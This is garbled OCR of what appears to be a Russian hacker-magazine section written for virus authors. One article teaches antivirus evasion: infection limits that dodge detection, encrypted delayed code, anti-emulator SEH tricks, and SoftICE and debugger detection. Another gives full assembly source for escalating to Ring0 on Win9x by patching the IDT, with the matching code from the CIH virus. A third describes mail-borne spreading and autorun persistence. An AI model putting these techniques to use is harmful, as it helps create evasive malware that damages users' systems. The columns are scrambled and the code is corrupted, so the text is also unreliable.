Эта постоянная гонка ведет к усложнению технологий. Сейчас, если вирус не является полиморфным, его шансы выжить 
равны нулю. Вирусам необходимо защищаться. Эта статья - попытка описать и обобщить способы выживания вирусов. 


ОСНОВНЫЕ 


m На распростране- 


Сейчас, ес- 
ли вирус не 
является 
полиморф- 
ным, его 
шансы вы- 
жить равны 
нулю. 


На распро- 
странение 
вируса тре- 
буется ка- 
кое-то вре- 
мя. На на- 
писание 
"лечилки" 
для вируса 
также нуж- 
но время. 
Причем чем 
меньше 
первое вре- 
мя, и боль- 
ше второе - 
тем лучше. 


Многие ви- 


русописате- 
ли любят 
вставлять в 
свои творе- 
ния красоч- 
ные эффек- 
ты, картин- 
ки, надписи, 
а иногда 
просто 
деструктив- 
ные функ- 
ции. Они не 
понимают, 
что этим 
просто уко- 
рачивают 
им жизнь. ф 


ние вируса требуется 
какое-то время. На на- 
писание "лечилки" для вируса также 
нужно время. Причем, чем меньше 
первое время и больше второе, тем 
лучше (для вирусописателей, конеч- 
но). На этом основываются все прие- 
мы защиты. Существует множество 
видов защит вирусов, но оптималь- 
ной стопроцентной защиты не суще- 
ствует, и вообще, сколько вирусопи- 
сателей - столько и мнений на этот 
счет. Я постараюсь выделить самые 
основные виды и как-то их классисри- 
цировать. 

Защита может быть двух видов: ак- 
тивная и пассивная. К пассивной за- 
щите можно отнести принципы слож- 
ности и незаметности. К активной - 
различные механизмы обновления че- 
рез Сеть. Также активным способом 
являются приемы защиты от отладчи- 
ков и дизассемблеров, которые будут 
рассмотрены в конце статьи. Есть еще 
одна классификация защит - по эта- 
пам. Время жизни вируса можно ус- 
ловно разделить на следующие этапы: 

Ф. Распространение вируса. 

@. Попадание в антивирусную кон- 
Topy. 

@. Выпуск антивируса. 

Защита принципиально отличается 
на каждом этапе. 


РАСПРОСТРАНЕНИЕ ВИРУСА 

и Главное правило выживания на 
этом этапе - незаметность. Многие ви- 
русописатели любят вставлять в свои 
творения красочные эфоректы, кар- 
тинки, надписи, а иногда просто дест- 
руктивные функции. Они не понима- 
ют, что этим укорачивают им жизнь. 
Необходимо применять различные 


способы сокрытия вируса в системе, 
если он резидентен. Иногда очень 3¢p- 
фективны простые ограничения на 


заражаемые системы: установлен 
Softlce - не заражать, установлен AVP 
- не заражать и т.д. Конечно, так MHO- 
гие компьютеры просто не будут зара- 
жены. Но зато и вирус почти наверня- 
ка не будет обнаружен. Еще лучше 
сделать такие ограничения временны- 
ми. К примеру, проходит месяц, вирус 
заразил большое количество машин, 
но лишь простых пользователей, не 
беспокоящихся о безопасности, потом 
все ограничения снимаются, и вирус 
начинает полноценно размножаться, 
но уже не с одной машины, как в на- 
чале, а с нескольких тысяч. 


ше и больше распространяется вирус. 
Главный принцип защиты на этом эта- 
пе - сложность. Простейший вирус бу- 
дет определен с помощью эвристи- 
ческого анализа еще на первом этапе. 
Хороший полиморерный вирус потре- 
бует нескольких часов работы специ- 
алистов из антивирусной конторы. 
Анализ сложного пермутируещего ви- 
руса может занять несколько дней. 


ВЫПУСК АНТИВИРУСА 

ш Даже на этой стадии есть спосо- 
бы выжить. Наиболее популярное 
решение - обновление через Сеть. 
Вирус просто скачивает свою об- 
новленную (и не детектируемую) 
версию из интернета и продолжает 
распространение. Вот только сайты, 
с которых скачиваются обновления, 
очень быстро закрывают. Пучше ис- 
пользовать что-то другое, например 
peer-to-peer сети. Есть еще один, 
малоизвестный, но хороший способ 
- использование delayed code. Спо- 
соб заключается в том, что некая 
часть вируса зашифрована. Во вре- 
мя своей работы вирус перебирает 
ключи, пытаясь расшифровать этот 


Необходимо применять различные 
способы сокрытия вируса в системе, 


если он резичентен, 


ПОПАДАНИЕ 
В АНТИВИРУСНУЮ КОНТОРУ 

и Рано или поздно вирус будет об- 
наружен, и какой-нибудь особо "ум- 
ный" пользователь отошлет его анти- 
вируснику. Теперь игра идет на мину- 
ты, чем дольше антивирусник разби- 
рается в алгоритме вируса, тем боль- 


С: `Ркодкатт1пч\$ ира irii>\Fasm\fasm.exe my_virii.asm 


flat assembler 
2 passes, 185 bytes. 


G:\Progranmming\Supavirii>_ 
2 


version 1.48 


код. Допустим, через месяц OH, Ha- 
конец, расшифровывает код, вирус 
меняется, и все антивирусы дружно 
идут на фиг. Конечно, антивирусни- 
ки могут достать суперкомпьютер и 
по-быстрому расшифровать код, но 
где ты видел суперкомпьютеры в 
свободном доступе? 


my _virii.exe 
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КАК РАБОТАЕТ АНТИВИРУС 

ш Практически невозможно напи- 
сать защищенный вирус, не понимая, 
как работает антивирус. Это необхо- 
димо, если ты не хочешь, чтобы твой 
вирус определялся антивиром сразу 
же после написания. На самом деле, 
большинство вирусных технологий, 
таких, как полиморфизм, метамор- 
cpus или UEP, появились благодаря 
борьбе с антивирусами. Задача анти- 
вируса определить, содержит ли прог- 
рамма вирус. По мере проверки прог- 
раммы, если антивирус находит харак- 
терные признаки вируса, он увеличи- 
вает некую переменную. При дости- 
жении этой переменной установлен- 
ного критического значения считает- 
ся, что файл заражен. 

Основным способом детектирования 
вирусов является проверка с по- 
мощью сигнатур. Сигнатура - это пос- 
тоянный кусок кода, характерный для 
вируса, но не характерный для обыч- 
ной программы. Это основной способ 
детектирования вирусов еще со вре- 
мен ДОСа. Как защита от этого был 
придуман полиморсоризм. Тело вируса 
шифруется переменным ключом, и 
расшисрровщик каждый раз меняется. 
В идеале - это полноценная защита от 
антивирусов. На практике же часто 


на множество инструкций. Принцип 
прост - полиморфрные генераторы несо- 
вершенны и генерируют далеко не весь 
возможный набор инструкций. Исходя 
из этого и определяется конкретный 
вирус. К примеру, если вирус 
Win32.ExampleVir никогда не генериру- 
ет дешифровщик с опкодом pushad, а в 
проверяемом срайле он есть, следова- 
тельно, это какой-то другой вирус. Дан- 
ный способ детектирования основан на 
несовершенстве вирусов, так что доста- 
точно немного лучше сгенерировать 
полиморфный дешисфровщик в своем 
вирусе, чтобы свести на нет все попыт- 
ки антивирусов. Конечно, это сложно, 
но кто говорил, что будет легко? 


чика, но вот эмулятору или отладчику 
gO такого понимания ой как далеко. 

Можно определять наличие отлад- 
чика "легальным" способом. Для это- 
го существует соответствующая АР! 
функция - isDebuggerPresent. Приме- 
нять ее просто: 


call isDebuggerPresent 
ог eax,eax 
jnz __we_under_debug 


Этот метод прекрасно работает для 
WDasm или OllyDbg, но, конечно же, 
он бесполезен в борьбе с Зо се'ом. 

Можно очень легко определить, ус- 
тановлен ли в системе 5о се (и Tak 


Основным способом детектирования 
вирусов является проверка по сигнатуре. 


ПРАКТИКА. ANTI*-TRICKS 

и Когда вирус попадает в антиви- 
русную контору, его начинают мучить 
всеми возможными способами. Его от- 
лаживают, дизассемблируют, натрав- 
ливают ему кучу маленьких сфайлов- 
приманок и еще много всего. Погово- 


же легко это обойти). Достаточно поп- 
робовать открыть драйвер айса. Имя 
драйвера: SICE, SIWVID gna Win9x, 
NTICE gna WinNT. 


sice9x db '\\.\SICE! 


push sice9x 


плохой полиморфный расшисфровщик рим о том, как защитить вирус от по- 
сам по себе является сигнатурой. Тем добных издевательств. call [CreateFileA] 
не менее, детектировать вирусы стало Использование SEH - один из луч- cmp еах,-1 


сложнее, и антивирусникам пришлось 
придумывать что-то новое. И этим но- 
вым стала эмуляция кода. 

Как только антивирус натыкается на 
код, подозрительно похожий на рас- 
шифровщик, он начинает одну за дру- 
гой выполнять инструкции, эмулируя 
работу процессора. В процессе чего за- 
шисфрованный код становится рас- 


ших и универсальных способов. Во- 
первых, эмулятор антивируса на та- 
ком коде обламывается, во-вторых, 
отладчики тоже обламываются, при- 
чем все. Как ты знаешь, $ЕН - струк- 
турный обработчик ошибок. Мы мо- 
жем назначить свой обработчик, и 
при возникновении любой ошибки он 
будет вызван. Удобно конечно, но 


ле SoftICE_Detected 


Если открытие было успешным - зна- 
чит, зо се установлен. Параллельно 
можно искать подозрительные записи 
в реестре - 
HKEY_LOCAL_MACHINE\Software\NuM 
ega\SoftICE, и файлы, типа loader32 
или sivwid.386. Для обмана дизассемб- 


шифрованным, а вирус обнаружен- смысл способа не в этом. леров также есть несколько приемов. Практичес- 
ным. Все это было бы очень неприятно, Я приведу пример, и ты сам пой- Например, вот такой хитрый прыжок: auto iat 
если бы не кривые руки программистов ~— мешь: ЕО ЕЕ 
антивирусных контор. Этот эмулятор не jmp .ntdbg+2 щищенный 
понимает ни инструкций сопроцессора, call .init_seh -ntdbg: я, 
ни вызовов API срункций, ни уж тем бо- mov esp,[esp+8] dw Oxc606 как работа- 
лее конструкции SEH, и любой хоть pop dword [fs:0] we 
немного уважающий себя вирус содер- рор еах 
жит как минимум парочку трюков, сби- IDA таким простым триком не обма- 
вающих эмулятор с толку. ; здесь код вируса нуть, но большинство дизассембле- 

Современные антивирусы знают мно- ров выдают в этом месте всякий бес- 
жество способов детектирования виру- init_seh: полезный мусор. Чего и требовалось ЕЕ 
сов. Т.к. поиск должен производиться push dword [fs:0] добиться. антивирусы 
быстро, они не проверяют каждый mov [fs:0],esp GEG Gage 

> ны однои 

cpaiin, а используют так называемые ЗАКЛЮЧЕНИЕ медали. И 
маски отбора. Сначала отбрасываются xor ebx,ebx m Как ни старайся, полностью не за- не будет 
все неисполняемые сайлы, потом срай- div ebx ; вызываем ошибку щитишься от антивирусников. Как ни На 


лы, которые не могут быть заражены (к 
примеру, из-за размера). Далее произ- 
водится сравнение по базе сигнатур. 
Если обнаружен полиморорный или 
метаморорный вирус, то он проверяется 


Человеку, конечно, понятно, что при 
возникновении ошибки управление 
передается на код вируса, который 
выполняет здесь роль 5ЕН-обработ- 


...проверка на Softice легко лечится исправлением вот этих строчек... 


пытайся, не создашь абсолютно неде- 
тектируемый вирус. Вирусы и антиви- 
русы - две стороны одной медали. И 
не будет одного без другого. Но это 
уже филососрия. i 


shen_@mail.ru) 


RINGO 


УХОД В НУЛЕВОЕ КОЛЬЦО ЗАЩИТЫ WIN9X 


ерво-наперво я вкрат- 


це расскажу тебе о 


том, что такое protect- 


На релизе 
\Мт95 
Гейтс ска- 
зал, что но- 
вая система 
на 100% 
защищена 
от вирусной 
угрозы, так 
как, благо- 
даря ис- 
пользова- 
нию особых 
технологий, 
она незара- 
жаема в 
принципе. 


ed mode aka защищен- 

ный режим. Ты спра- 
шиваешь, зачем вирмейкеру знать 
РМ? Хм. На релизе Win95 Гейтс ска- 
зал, что новая система на 100% 3a- 
щищена от вирусной угрозы, так как, 
благодаря использованию особых 
технологий, она незаражаема в прин- 
ципе. Он имел в виду, что все взаимо- 
действие потенциального вирмейке- 
ра с системой будет проходить не 
напрямую, а через некий шлюз. Роль 
такого шлюза в \\п32-системах игра- 
ет API. На эту тему можно еще много 
разглагольствовать, но факт остает- 
ся фактом: если писать под Windows 
традиционным, так сказать, офици- 
альным способом, об эфорективных 
вирусах действительно можно за- 
быть. Но кто сказал, что нет альтер- 
нативных методов? Один из таких ме- 
тодов описан в этой статье. Но для 
понимания его сути тебе надо кое-что 
знать о защищенном режиме процес- 
сора. Думаю, ты хоть немного знаешь 
ассемблер, поэтому я не буду объяс- 
нять, что значит "Mov word ptr". 


РМ АКА ЗАЩИЩЕНКА 

ш 286+ процессор имеет два режи- 
ма работы: реальный и защищенный 
(на самом деле, есть еще один - V86, 
но для нас это несущественно). Ре- 
альный - это таблица векторов преры- 
ваний, свободный доступ к портам и 
прочие прелести. Режим защищен- 
ный намного сложнее и запутаннее, 
но ничего не поделаешь - придется 
разбираться. К тому же, в этот раз мы 
коснемся его совсем чуть-чуть. 


Зачем вообще нужен защищенный 
режим? Принято считать, что DOS - 
это однозадачная ОСЬ. Позвольте, а 
как же тогда резиденты? Так что мно- 
гозадачность в DOS'e была, но не та- 
кая, какой бы ее хотелось видеть: от- 
сутствие приоритетов при переключе- 
нии задач, единое адресное простран- 
ство для всех запущенных процессов 
ит.9. Всех этих недостатков лишен за- 
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щищенный режим, предоставляющий 
принципиально новые возможности 
для реализации многозадачности, и 
одна из этих возможностей - защита 
программ от взаимного влияния, кото- 
рая и дала название всему режиму. 


Первое, что ты должен узнать, так это 
понятия "сегмент", "дескриптор" и 
"селектор". Сегмент, грубо говоря - 
это изолированный кусок памяти. 
Дескриптор - это структура, описыва- 
ющая конкретный сегмент. В дескрип- 
торе содержится такая информация, 
как адрес сегмента в памяти, его раз- 
мер, тип, привилегии и т.д. Все деск- 
рипторы собираются в три основные 
таблицы: СОТ (Global Descriptor Table), 
LDT (Local Descriptor Table) и IDT 
(Interrupt Descriptor Table). Я сказал, 


сегментов), не выходя за его пределы. 
В этом и заключается защита прог- 
рамм от взаимного влияния, которой 
так не хватало в real mode. 


Другим важным преимуществом за- 
щищенного режима является воз- 
можность реализации механизма 
страничной виртуальной памяти, ко- 
торый позволяет выгружать неис- 
пользуемые страницы памяти на диск 
и загружать их обратно в оперативку, 
только когда они потребуются. Тот же 
механизм кэширует часто используе- 
мые страницы для ускорения доступа 
к ним. Все это существенно повышает 
производительность системы. 


Любой, даже самый навороченный, 
процессор при включении компьюте- 


Режим защищенный намного 
сложнее и запутаннее, 


но ничего не поделаешь - 
придется разбираться 


три таблицы. Не совсем так, потому 
что LDT может быть и не одна, на то 
она и локальная. Селектор - это иден- 
тификатор дескриптора, указатель на 
дескриптор в таблице дескрипторов. 
Хранится он в каждом из сегментных 
регистров - CS, DS и т.д. (помнишь, в 
реальном режиме там хранилась база 
сегментов кода, данных и стека). Про- 
цессор, при обращении к сегменту, 
сначала извлекает из сегментного ре- 
гистра селектор, с помощью селекто- 
ра находит в таблице дескриптор, а 
уже в дескрипторе описано положе- 
ние требуемого сегмента в памяти, 
привилегии ит.д. 


Процессор, находясь в защищенном 
режиме, четко следит, чтобы одновре- 
менно работающие программы не 
имели доступа в сегменты друг друга, 
таким образом каждая программа ра- 
ботает в своем сегменте (или группе 


ра начинает свою работу в реальном 
режиме. Переход в РМ необходимо 
осуществлять вручную. Информация 
о том, в каком режиме в настоящее 
время работает процессор, хранится в 
нулевом бите регистра CRO (0 - реаль- 
ный, 1 - РМ), таким образом, перевод 
процессора в защищенный режим 
заключается в установке этого самого 
нулевого бита в значение 1: 


mov eax, сгО ; как и к большин- 
ству системных регистров, 

ога,1 ; к сгО нельзя обращаться 
напрямую 

mov сгО, eax 


Ho не все так просто: прежде чем пе- 
реходить в РМ, нужно приготовить 
все необходимые для него структуры: 
СОТ, ГОТ, IDT. И если без последних 
двух можно обойтись, СОТ должна 
присутствовать всегда. Так кто же пе- 


реключает процессор в защищенный 
режим? При загрузке компьютера, 
после выполнения тестов памяти и 
устройств (POST), БИОС передает уп- 
равление загрузчику ОС, который и 
осуществляет переход в РМ. Добав- 
лю, что процессор позволяет изме- 
нять регистр СКО только программам, 
работающим на нулевом кольце за- 
щиты. Что это за кольцо такое? Плав- 
но переходим к уровням привилегий... 


лее привилегированному сегменту, но 
может сделать запрос на доступ к ме- 
нее привилегированному. Для этого и 
существует возможность изменения 
поля RPL селектора (Requested 
Privilege Level - запрашиваемый уро- 
вень привилегий). 

Windows использует только два уров- 
ня (кольца): нулевой оля себя и тре- 
тий для всех остальных. Т.е. любая на- 
писанная нами Win32-nporpamma бу- 


Других возможностей перейти 
с третьего пользовательского 
кольца на нулевое 
системное нет 


КОЛЬЦА ЗАЩИТЫ 

и Винтеловском процессоре реали- 
зован механизм "уровней защиты", 
заключающийся в том, что каждая 
программа имеет один из четырех 
уровней привилегий (0-3, где нулевой 
- самый привилегированный). Напри- 
мер, возможное распределение: 0 - 
ядро системы, 1 - драйверы, 2-3 - поль- 
зовательские программы. Ты еще 
помнишь про сегменты, дескрипторы 
и селекторы? Каждая программа вла- 
деет, по меньшей мере, двумя сегмен- 
тами: кода и данных. При запуске 
программы операционка создает деск- 
рипторы для этих сегментов и присва- 
ивает этой программе определенный 
уровень привилегий, записывая соот- 
ветствующее значение в поле DPL 
(Descriptor Privilege Level) дескрипто- 
ра сегмента кода. Обычная программа 
не может изменить это значение, но 
может узнать его. Поле DPL дескрип- 
тора сегмента кода копируется в поле 
RPL селектора этого дескриптора. Ce- 
лектор дескриптора кода хранится в 
сегментном регистре CS, поэтому 
программа может узнать, какой уро- 
вень привилегий она имеет, но не мо- 


Кольца защиты 


жет изменить его. Не поможет даже 
изменение поля RPL селектора - OC 
предоставляет программе доступ ку- 
да-либо, основываясь на большем из 
значений DPL и RPL. Таким образом, 
программа не сможет обратиться к бо- 


дет работать в третьем кольце и 
иметь наименьший уровень привиле- 
гий! Помнишь, что сказал Гейтс нас- 
чет вирусов и Win95? Единственным 
документированным методом обра- 
титься к сервисам нулевого кольца 
является написание VXD, но это че- 
ресчур громоздкий и неудобный спо- 
соб. А других возможностей перейти с 
третьего пользовательского кольца 
на нулевое системное нет! Но не зря 
же я сказал "единственным докумен- 
тированным методом". Всего же в go- 
кументации не упомянешь :). И вот, 
мы вплотную подобрались к теме 
статьи: как же все-таки попасть на 
вожделенный ноль-уровень? 


ПРЕРЫВАНИЯ 

м Помнишь, я говорил о трех деск- 
рипторных таблицах: СОТ, ГОТ и ОТ? 
Нас будет интересовать последняя - 
ОТ. Крайне интересным для нас явля- 
ется тот CpakT, что в этой таблице хра- 
нятся дескрипторы прерываний и иск- 
лючений, т.е. Interrupt Descriptor Table 
защищенного режима - это аналог 
Interrupt Vector Table режима peanb- 
ного. Когда возникает исключение, 
процессор ищет в IDT запись с соот- 
ветствующим номером и передает уп- 
равление обработчику по адресу, хра- 
нящемуся в дескрипторе. Исключения 
обрабатываются на нулевом уровне 
привилегий. Стоп! Обработчик исклю- 
чения работает в RingO, а программа, 
вызвавшая исключение - в Ring3? 
Как же так? Для разрешения такого 
противоречия используется механизм 
шлюзов. Шлюз - это специальный 
объект, через который процессор мо- 
жет "передвигаться" между уровнями 
зашиты. Когда программа на третьем 
уровне вызывает исключение, про- 


цессор через шлюз спускается на ну- 
левой уровень, передает управление 
обработчику, а когда обработчик 
возвращает управление, процессор, 
опять же через шлюз, возвращается 
в Ring3. Т.е. когда управление получа- 
ет обработчик, он автоматически име- 
ет наивысший уровень привилегий. 
Ничего не приходит в голову? А если 
я скажу, что Win9x разрешает прог- 
раммам с третьего кольца безнака- 
занно модифицировать ШТ? Видимо, 
это у Microsoft такая традиция, фир- 
менный почерк - предоставлять сво- 
бодный доступ к таблицам векторов 
прерываний, что в реальном, что в за- 
щищенном режиме :). Что будет, если 
мы подменим адрес обработчика пре- 
рывания М в соответствующем деск- 
рипторе на адрес своей процедуры, а 
потом из нашей Втд3-программы вы- 
зовем это самое прерывание N? Вер- 
но! Процессор перейдет на нулевой 
уровень защиты, найдет в нужном 
дескрипторе адрес обработчика и пе- 
редаст тому управление. Т.е. "включит 
режим RingO" и передаст управление 
нашей процедуре! Там мы будем вся- 


Все деск- 
чески наслаждаться полным доступом рипторы со- 
к ресурсам компьютера и самой систе- бираются в 
мы, а когда надоест, вернем управле- АННЫ 
ние процессору, тот через шлюз "под- цы: GDT 
нимет" нас Ha Ring3, где мы спокойно ео 
продолжим работу на "юзерском" Table), LDT 
уровне. Правда, перед этим нам при- А Е 
дется восстановить в IDT старый ag- Tabiev a IDT 
рес обработчика, чтобы не нарушить (Interrupt 
работу операционки и не вызвать А 


лишних подозрений. Итак, начинаем 
писать. Нам потребуется Тазт 5.0 и 
сама Win9x, больше ничего. 


код 

ш Примерная последовательность 
действий: 

@. Сохранить адрес старого обра- 
ботчика. 

©. Модифицировать IDT, подменив 
адрес обработчика на адрес нашей 
процедуры. 

©. Вызвать перехваченное преры- 
вание. 

@. Посидеть в RingO :). 

@. Восстановить адрес старого об- 
работчика. 
Весь наш план основан на манипуля- 
циях с IDT. Но мы ведь даже не знаем, 
где находится эта IDT, у нее нет фик- 
сированного положения в памяти. 
Для этого в процессоре существует 
группа регистров, связанных с табли- 
цами дескрипторов: GDTR, LDTR и 
ОТБ. Нас, естественно, интересует 
последний. В нем хранится размер 
таблицы (правильнее, предел) и адрес y, 


адрес начала ОТ 


Формат регистра РТВ 


предел 


При запуске 
программы 
операцион- 
ка создает 
дескрипто- 
ры для этих 
сегментов и 
присваивает 
этой прог- 
рамме опре- 
деленный 
уровень 
привиле- 
rH... 


63 48 47 32 


31 16 15 0 


параметры 


Формат дескриптора прерывания в ШТ 


Как найти в ОТ нужный дескриптор? 
У нас уже есть адрес начала таблицы, 
и мы знаем размер каждого 
дескриптора - что еще нужно? 


ее начала. IDTR - регистр формата 
fword (word:dword), т.е. б-байтный. 
Первые 16 разрядов занимает предел, 
все остальное - адрес. Нам потребует- 
ся только адрес, он находится в IDTR 
по смещению +2. 


К содержимому регистра нельзя обра- 
щаться напрямую, для этого сущест- 
вует привилегированная команда sidt 
(Save IDTr): 


idtr df [6] 
sidt fword ptr [idtr] 


Теперь мы можем получить адрес на- 
чала IDT: 


idtr df |6) 


sidt fword ptr [idtr] 
mov ebx,dword ptr [idtr+2] 


Пришло время разобраться с форма- 
том дескрипторов прерываний. 


Всего 8 байт. Селектор сегмента и па- 
раметры мы трогать не будем, нас ин- 
тересует только адрес, так и запом- 
ним: младшее слово адреса обработ- 
чика находится по смещению +0 от 
начала дескриптора, старшее - по +6. 


Как найти в IDT нужный дескриптор? 
У нас уже есть адрес начала таблицы, 
и мы знаем размер каждого дескрип- 
тора - что еще нужно? 


intnum equ O4h ; лучше перехва- 
тывать малоиспользуемые прерыва- 
ния 

idtr df O ; сюда мы сохраним IDTR 
sidt fword ptr [idtr] 

няем ОТР в переменную idtr 
mov ebx,dword ptr [idtr+2] ;нам ну- 
жен адрес начала, a He предел 

add ebx,intnum*8 ; перехо- 
дим на начало нужного дескриптора 


; сохра- 
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Все, теперь в ebx адрес дескриптора 
прерывания с номером O4h. Сохраним 
адрес оригинального обработчика: 


saved аа О; сюда мы сохраним ag- 
рес старого обработчика 


mov ax,word ptr [ebx+6] ; кладем 
в ах старшее слово адреса обработ- 
чика 

shl eax,16 
слово eax 
mov ax,word ptr [ebx] __; Knagem в ax 
младшее слово адреса обработчика 
mov dword ptr [заме ],еах ; сохраняем 


‚ сдвигаем его в старшее 


Заменим в дескрипторе адрес обра- 
ботчика на адрес нашей процедуры: 


mov eax, offset ringOcode 
в ах смещение процедуры 
mov word ptr [ebx],ax 

; заменяем младшее слово адреса 
shr еах/6 ; сдвигаем старшее слово 
еах в младшее 

mov word ptr [ebx+6],ax 
старшее слово адреса 


‚ Кладем 


‚ заменяем 


ringOcode: ; где-то здесь наша про- 
цедура 


Все! Торжественный момент - можно 
генерить прерывание! 


int intnum 


МЫ В RINGO! 


ringOcode: 

; здесь мы можем делать что 
угодно, 

; ведь мы уже в нулевом 
кольце! 


iret ; возвращаемся в обы- 
денность 


Теперь пришла пора горьких разоча- 
рований. Попробуй вызвать из RingO 
функцию MessageBox. Попробуй и 
любуйся синим экраном с белыми 
надписями :). Дело в том, что 
Win32API, к которым относится 
MessageBox, доступны лишь на треть- 
ем, пользовательском, уровне. RingO 
предоставляет другие методы работы 
- МхО-сервисы. И, если вдуматься, TO 
никаких разочарований быть не мо- 
жет - эти сервисы дают кодеру такие 
возможности, что ты уже никогда не 
сможешь заставить себя пользовать- 
ся API :). Чего стоит только установка 
обработчика файловой системы! 


Однако, мы задержались, пора домой: 
iret 


Прежде чем выходить, нужно восста- 
новить адрес старого обработчика: 


mov eax,dword ptr [saved] 
mov word ptr [ebx],ax 

shr eax,16 

mov word ptr [ebx+6],ax 


А теперь можно и завершаться: 


push OOh 
call ExitProcess 
end start 


ЧТО ДАЛЬШЕ? 

ш Что делать, оказавшись в нуле- 
вом кольце? Открывать Win95DDK и 
учиться пользоваться \хО-сервисами. 


Прежде чем выходить, 
нужно восстановить 
адрес старого обработчика 


) шибка при запуске программы 


Чтобы не увидеть такую табличку, мы и пишем ключ /т!/ 


ПОЛНЫЙ ТЕКСТ ПРОГРАММЫ 


; RingO.asm 

; КОМПИЛЯЦИЯ: 

; tasm32 /ml RingO.asm 

; tlink32 RingO.obj,,,import32.lib 


.386p 
.model flat 


; нам понадобится привилегированная команда sidt 


extrn ExitProcess:proc 
extrn MessageBoxA:proc 


intnum equO4h __ ; лучше перехватывать малоиспользуемые прерывания 


„Ааа 


idtr O; сюда мы сохраним IDTR 

saved О ; сюда мы сохраним адрес старого обработчика 
capt "Message!",0 

text "At Ring3 now. Boring.",O 

text2 "I've just returned from RingO!",O 


„сое 

start: 

push ООВ 

push offset capt 
push offset text 
push ООВ 

call MessageBoxA 


; найдем адрес IDT и нужного нам дескриптора 

sidt fword ptr [idtr] ; сохраняем IDTR в переменную idtr 

mov ebx,dword ptr [idtr+2] ; нам нужен адрес начала, а не предел 

add ebx,intnum*8 ; переходим на начало нужного дескриптора 


; сохраним адрес оригинального обработчика 

mov ax,word ptr [ebx+6] ; кладем в ах старшее слово адреса обработчика 
shl eax, 16 ; сдвигаем его в старшее слово eax 

mov ax,word ptr [ebx] 
mov dword ptr [saved],eax ; сохраняем 
; меняем адрес обработчика на адрес нашей процедуры 

mov eax, offset ringOcode ; кладем в ах смещение процедуры 

mov word ptr [ebx],ax ; заменяем младшее слово адреса 

shr eax,16 ; сдвигаем старшее слово еах в младшее 
mov word ptr [ebx+6],ax — ;заменяем старшее слово адреса 


; уходим в RingO 
int intnum 


; восстанавливаем адрес оригинального обработчика 
mov eax,dword ptr [saved] 

mov word ptr [ebx],ax 

shr eax,16 

mov word ptr [ebx+6],ax 


; сообщим миру, что мы пережили это путешествие 
push OOh 

push offset capt 

push offset text2 

push OOh 

call MessageBoxA 


; ВЫХОДИМ 
push OOh 
call ExitProcess 


; в пределах этой процедуры мы имеем наивысший уровень привилегий 
ringOcode: 

; здесь мы можем делать что угодно, 

; ведь мы уже в нулевом кольце! 

iret ; возвращаемся в обыденность 


end start 


; кладем в ах младшее слово адреса обработчика 


(Е 


Тебе наверняка понравится функция 
IFSMgr_InstallFileSystemApiHook :). 


Скажу еще, что этот способ ухода в 
RingO не единственный, но самый 
простой. И именно этот метод исполь- 
зует небезызвестный WIN95.CIH 
(HookExceptionNumber - номер nepex- 
ватываемого исключения, 
MyExceptionHook - процедура инициа- 
лизации вируса на нулевом кольце): 


push eax 
sidt [esp-O2h] 
pop ebx 


add 

ebx, HookExceptionNumber*08h+04h 
cli 

mov ebp,[ebx] 

mov bp,[ebx-O04h] 


lea esi,MyExceptionHook-@1[ecx] 
push esi 


mov [ebx-04h],si 
shr esi,16 
mov [ebx+02h],si 


pop esi 
int HookExceptionNumber 


К чести Microsoft Hago заметить, что 
на NT-based Виновс этот трюк не сра- 
батывает. Но кто сказал, что мы знаем 
только один трюк ? :) a 


Ш www.wasm.ru - если ты 
интересуешься ассембле- 
ром, это лучшее место во 
всем рунете: огромное ко- 
личество статей, инстру- 
ментов и пр. 


Ш www.rusfag.ru - здесь ты 
можешь задать любой воп- 
рос по ассемблеру. И, 
представь, на него даже от- 
ветят :). 


Ш www.programmersheav- 
en.com/zone5 - подраздел 
портала Ргодгаттег"$ 
Heaven, посвященный acce- 
мблеру (на английском). 


Ш http://board.win32asm- 
community.net/ - один из 
крупнейших форумов по 
ассемблеру (на 
английском). 


К чести 
Microsoft 
надо заме- 
тить, что на 
NT-based 
Виновс этот 
трюк не 
срабатыва- 
ет. Но кто 
сказал, что 
мы знаем 
только один 
трюк ? :) 


HIGH LEVEL CODE | 


HIGH LEVEL CODE 


ВИРУСЫ HA ЯЗЫКАХ ВЫСОКОГО УРОВНЯ 


В ЧЕМ СМЫСЛ 


ЖИЗНИ? 


ш Я имею в виду, ко- 


нечно, смысл жизни 


С распрост- 
ранением 
все ясно - 
тут амбиции 
вирей прос- 
тираются 
от текущего 
каталога 
(да, были и 
такие ше- 
девры) до 
массовой 
рассылки 
себе подоб- 
ных по мы- 
лу или с по- 
мощью ба- 
гов ПО. 


вируса, а не вирмейке- 
ра, поскольку смысл жизни последне- 
го интересует только товарищей из 
НИИ Судебной Психиатрии им. 
Сербского для разработки курсов ле- 
чения :). Я не могу рассказать обо 
всех вирусах на 4 полосах, поэтому 
возьму понемногу от каждого и назо- 
ву его "средним вирусом". Итак, сред- 
ний вирус посвящает свою жизнь 
следующему: 


Ф. Распространение. 

@. Поиск жертвы и заражение. 

@. Противодействие антивирусам. 

@. Какие-то еще заложенные авто- 
ром действия - звуковые эффекты, 
похабные надписи, деструкция и мно- 
гое другое. 


Этот человек не просто написал вирус. 
Он выразил свое мнение. Легализуйте 
анашу, господа! 


С распространением все ясно - тут ам- 
биции вирей простираются от текуще- 
го каталога (да, были и такие шедев- 
ры) до массовой рассылки себе по- 
добных по мылу или с помощью багов 
ПО. Большинство современных ЯВУ 
вирусов используют комбинацию 
всех этих способов, уделяя особое 
внимание етай-рассылке. Темы ви- 
русных писем (которые я регулярно 
тоннами выношу из своего мыльника) 
просто потрясают воображение - от 
"Re: BIG MONEY TODAY" go "4 Gb Big 
tits for free now in this message!!!" :). 
Что поделаешь, ведь задача его - что- 
бы ты только ПОСМОТРЕЛ это пись- 
мо, поскольку, благодаря использова- 
нию, например, бага IFrame, приатта- 
ченное тело вируса запустится само. 
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Текст же письма обычно полубредо- 
вый (комбинация из нескольких 
фраз) и никакого интереса не вызы- 
вает. Зато дальнейшие действия виря 
интересны, но о них я расскажу чуть 
позже. Есть, правда, и такие экземп- 
ляры, которые не используют багов 
ПО, зато присылают письмо с занят- 
ным заголовком и осмысленным кон- 
тентом, аргументировано объясняю- 
щим тебе, почему надо запустить ат- 
тач. Тут тоже фантазия распространя- 
ется от "for details see attach" go 
пространных объяснений. И ведь 3a- 


пускают - социальную инженерию 
никто не отменял. Попавший же на 
комп вирус обычно переносит свое 
тело в укромное место (c:\win, напри- 
мер) со случайным именем и записы- 
вает этот файл в автозагрузку (обыч- 
но через RUN реестра, хотя способов 
таких - куча). Более продвинутые то- 
варищи так не делают, а заражают 
уже имеющиеся в автозагрузке проги. 
